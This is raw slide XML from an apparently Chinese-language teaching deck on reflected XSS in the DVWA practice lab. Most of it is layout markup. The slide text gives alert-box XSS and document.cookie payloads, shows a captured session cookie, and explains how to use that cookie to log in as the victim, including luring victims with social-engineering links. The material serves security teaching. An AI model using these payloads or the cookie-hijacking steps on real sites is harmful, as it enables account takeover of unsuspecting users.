          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5943600" y="1600200"/>
            <a:ext cx="5767705" cy="4487545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7315200" y="6248400"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图10-7    测试结果图</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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5" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1752600"/>
            <a:ext cx="10257790" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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测试是否可以XSS攻击（注意这步及其关键，无论是反射型还是存储型都要先进性XSS的测试），在输入框输入&lt;script&gt;alert('XSS')&lt;/script&gt;，弹出窗口，可见存在XSS漏洞，其结果如图10-8所示。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="493395"/>
            <a:ext cx="5483860" cy="878205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16478" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" alt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反射型XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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1600200" y="1143000"/>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1.低安全级别</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pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="图片 8"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810000" y="3200400"/>
            <a:ext cx="4692015" cy="1829435"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4953000" y="5105400"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图10-8   测试结果图</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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5" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="1371600"/>
            <a:ext cx="10257790" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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接下来就可以获取相关权限进行渗透，首先拿到此页面的cookie，攻击者直接通过一些方式（社会工学）让受害者点击一个链接，这个链接就会拿到受害者在这个页面的cookie，下图拿到的cookie只是简单的测试一下XSS的漏洞威胁获取当前页面的cookie，</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="493395"/>
            <a:ext cx="5483860" cy="878205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16478" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" alt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反射型XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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1600200" y="1143000"/>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1.低安全级别</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pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 9"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276600" y="2895600"/>
            <a:ext cx="5533390" cy="3670300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="6553200"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图10-9 获得用户的cookie数据</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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5" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1541780"/>
            <a:ext cx="10257790" cy="1938020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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具体如下所示：</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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&lt;script&gt;alert(document.cookie)&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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 security=low;PHPSESSID=49acb6ca0a588a3176e77b602a36fce3</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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下面是拿到cookie数值结果图，具体如图10-10所示。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="493395"/>
            <a:ext cx="5483860" cy="878205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16478" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" alt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反射型XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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1600200" y="1143000"/>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1.低安全级别</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pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 10"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2971800" y="3581400"/>
            <a:ext cx="5951855" cy="2371725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038600" y="6054725"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图10-10  拿到cookie数值测试结果图</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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5" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1541780"/>
            <a:ext cx="10257790" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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将拿到的这个cookie就可以以这个用户的名义去登录网页。测试过程如下，换一个浏览器 使用获得的cookie去登录，可见无需用户名与密码，直接登录上来了，其结果如图10-11所示。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="493395"/>
            <a:ext cx="5483860" cy="878205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16478" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" alt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反射型XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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1600200" y="1143000"/>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1.低安全级别</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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4114800" y="5943600"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图10-11 登录dvwa系统图</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 11"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429000" y="2895600"/>
            <a:ext cx="5140960" cy="2866390"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>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5" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1541780"/>
            <a:ext cx="10257790" cy="1014730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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这次先不去直接查看后端的代码，正常情况下是不能看到后端代码的（废话），这时候就要发挥想象力了，如果你觉得有些费力，可以通过查看页面的源代码，如图10-12所示。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="493395"/>
            <a:ext cx="5483860" cy="878205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16478" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" alt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反射型XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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1600200" y="1143000"/>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2.中安全级别</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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="6324600"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图10-12 中安全级源代码图</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 12"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429000" y="2667000"/>
            <a:ext cx="5441315" cy="3580130"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>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2000250" cy="2105025"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2000250" h="2105025">
                <a:moveTo>
                  <a:pt x="1922457" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2057171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60397" y="2071140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106298" y="2080010"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152651" y="2087570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="199439" y="2093801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246640" y="2098681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="294234" y="2102192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="342202" y="2104313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="390525" y="2105025"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="438845" y="2104313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="486812" y="2102192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="534406" y="2098681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="581605" y="2093801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="628392" y="2087570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="674745" y="2080010"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="720645" y="2071140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="766071" y="2060979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="811004" y="2049549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="855425" y="2036868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="899312" y="2022957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="942646" y="2007836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="985408" y="1991524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1027576" y="1974041"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1069132" y="1955408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1110056" y="1935645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1150327" y="1914770"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1189925" y="1892805"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1228831" y="1869768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1267025" y="1845681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1304486" y="1820563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1341196" y="1794433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1377133" y="1767313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1412278" y="1739221"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1446612" y="1710177"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1480113" y="1680202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1512763" y="1649316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1544541" y="1617538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1575427" y="1584888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1605402" y="1551387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1634446" y="1517053"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1662538" y="1481908"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1689658" y="1445971"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1715788" y="1409261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1740906" y="1371800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1764993" y="1333606"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1788030" y="1294700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1809995" y="1255102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1830870" y="1214831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1850633" y="1173907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1869266" y="1132351"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1886749" y="1090183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1903061" y="1047421"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1918182" y="1004087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1932093" y="960200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1944774" y="915779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1956204" y="870846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1966365" y="825420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1975235" y="779520"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1982795" y="733167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1989026" y="686380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1993906" y="639181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1997417" y="591587"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1999538" y="543620"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2000250" y="495300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1999538" y="446979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1997417" y="399012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1993906" y="351418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1989026" y="304219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1982795" y="257432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1975235" y="211079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1966365" y="165179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1956204" y="119753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1944774" y="74820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1932093" y="30399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1922457" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="80A2CA">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Freeform 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1581150" y="219075"/>
            <a:ext cx="66675" cy="57150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="66675" h="57150">
                <a:moveTo>
                  <a:pt x="33274" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20359" y="2250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9778" y="8381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2627" y="17466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2627" y="39683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9779" y="48768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20359" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33274" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46261" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56880" y="48768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64045" y="39683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66675" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64045" y="17466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56880" y="8381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46261" y="2250"/>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2" name="AutoShape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1581150" y="7048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3" name="AutoShape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1581150" y="3810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4" name="AutoShape 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1581150" y="5429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5" name="Freeform 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333500" y="219075"/>
            <a:ext cx="66675" cy="57150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="66675" h="57150">
                <a:moveTo>
                  <a:pt x="33274" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20359" y="2250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9778" y="8381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2627" y="17466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2627" y="39683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9779" y="48768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20359" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33274" y="57150"/>
                </a:lnTo>
